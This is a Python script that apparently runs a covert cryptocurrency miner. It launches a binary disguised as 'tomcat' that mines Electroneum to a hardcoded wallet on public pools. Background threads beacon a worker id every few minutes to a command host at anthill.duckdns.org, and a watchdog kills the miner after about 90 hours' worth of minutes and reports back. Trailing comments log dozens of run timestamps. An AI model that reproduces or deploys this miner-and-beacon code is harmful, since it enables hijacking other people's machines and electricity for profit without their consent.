import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:06:01.842099
#2018-02-17 16:52:03.563289
#2018-02-17 18:40:09.675734
#2018-02-17 20:28:05.546387
#2018-02-17 22:16:01.844463
#2018-02-17 23:59:05.911473
#2018-02-18 01:50:08.251909
#2018-02-18 03:38:07.339545
#2018-02-18 05:25:01.654324
#2018-02-18 07:17:05.141174
#2018-02-18 09:04:04.644122
#2018-02-18 10:51:02.120441
#2018-02-18 12:37:01.971764
#2018-02-18 14:23:04.206161
#2018-02-18 16:13:06.805286
#2018-02-18 18:02:03.540643
#2018-02-18 19:48:06.390311
#2018-02-18 21:34:04.812462
#2018-02-18 23:23:01.333936
#2018-02-19 01:10:08.511804
#2018-02-19 02:56:05.834161
#2018-02-19 04:43:07.631544
#2018-02-19 06:28:06.194112
#2018-02-19 08:17:07.066226
#2018-02-19 10:06:04.209241
#2018-02-19 11:55:08.171195
#2018-02-19 13:42:08.077640
#2018-02-19 15:32:06.096583
#2018-02-19 17:20:01.686214
#2018-02-19 19:08:01.899402
#2018-02-19 20:53:04.119513
#2018-02-19 22:42:04.115709
#2018-02-20 00:27:06.759655
#2018-02-20 02:14:04.669653
#2018-02-20 04:05:06.617816
#2018-02-20 05:48:03.523187
#2018-02-20 07:34:04.860529
#2018-02-20 09:19:01.869080
#2018-02-20 11:02:08.966505
#2018-02-20 12:50:13.146124
#2018-02-20 14:35:05.366057
#2018-02-20 16:19:01.866031
#2018-02-20 18:05:10.215550
#2018-02-20 19:56:07.055563
#2018-02-20 21:43:08.404916
#2018-02-20 23:23:07.584885
#2018-02-21 01:07:06.205834
#2018-02-21 02:54:05.283652
#2018-02-21 04:42:02.248254
#2018-02-21 06:29:05.498532
#2018-02-21 08:14:01.743039
#2018-02-21 10:00:02.541456
#2018-02-21 11:47:08.891709
#2018-02-21 13:39:04.099008
#2018-02-21 15:23:01.631802
#2018-02-21 17:13:04.468491
#2018-02-21 19:00:11.000957
#2018-02-21 20:47:01.989216
#2018-02-21 22:31:06.490524
#2018-02-22 00:21:09.647877
#2018-02-22 02:09:04.454834
#2018-02-22 03:54:05.071333
#2018-02-22 05:40:02.047689
#2018-02-22 07:25:09.923742
#2018-02-22 09:13:05.508429
#2018-02-22 11:00:10.580806
#2018-02-22 12:47:06.737287
#2018-02-22 14:33:05.786443
#2018-02-22 16:20:07.706382
#2018-02-22 18:06:01.918640
#2018-02-22 19:56:05.795277
#2018-02-22 21:45:06.970496
#2018-02-22 23:33:02.014753
#2018-02-23 01:20:03.656619
#2018-02-23 03:06:06.579919
#2018-02-23 04:52:05.771381
#2018-02-23 06:38:06.238552
#2018-02-23 08:28:07.807987
#2018-02-23 10:42:01.657700
#2018-02-23 12:36:09.818135
#2018-02-23 14:22:05.637283
#2018-02-23 16:12:09.790810
#2018-02-23 17:58:06.344284
#2018-02-23 19:43:05.242654
#2018-02-23 21:26:05.615441
#2018-02-23 23:14:01.969964
#2018-02-24 01:05:03.677847
#2018-02-24 02:56:01.381549
#2018-02-24 04:44:03.820719
#2018-02-24 06:35:07.100708
#2018-02-24 08:23:07.294414
#2018-02-24 10:07:05.912548
#2018-02-24 12:04:07.193088
#2018-02-24 13:52:06.284865
#2018-02-24 15:31:05.846788
#2018-02-24 17:24:01.448761
#2018-02-24 19:12:04.013290
#2018-02-24 21:00:08.004418
#2018-02-24 23:31:07.153612
#2018-02-25 03:39:07.022738
#2018-02-25 07:18:04.625878